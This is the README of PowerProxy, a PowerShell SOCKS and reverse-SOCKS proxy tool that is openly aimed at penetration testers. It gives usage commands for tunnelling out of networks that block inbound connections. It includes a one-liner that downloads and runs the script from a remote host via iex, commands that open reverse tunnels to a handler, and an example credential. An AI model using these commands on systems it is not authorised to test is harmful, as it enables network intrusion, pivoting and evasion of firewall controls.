PowerProxy

PowerShell SOCKS proxy with reverse proxy capabilities.

PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.

Setup

Import the script:

iex (new-object net.webclient).downloadstring("http://192.168.0.22/PowerProxy.ps1") 
# OR
Import-Module \\192.168.0.22\Public\PowerProxy.ps1

reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the —no-encrypt option.

Usage

For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py —help

Run a reverse proxy

On local machine, start the handler:

# Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080

In PowerShell:

Start-ReverseSocksProxy 172.1.1.20 -Port 8080

Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:

curl --socks4 127.0.0.1:1080 http://10.10.2.69/

Run a traditional SOCKS server

Start-SocksProxy 172.10.2.20 -Port 9050

Require authentication

Use PSCredential objects to require a username and password:

# Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force "Passw0rd123"
$Cred = New-Object System.Management.Automation.PSCredential ("ProxyUser", $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose

Limitations

• At the moment, only CONNECT requests are supported. BIND support is a goal, if practical.
• GSSAPI authentication is not supported.
• reverse_proxy_handler.py is only tested on UNIX-based machines, and probably doesn’t work on Windows.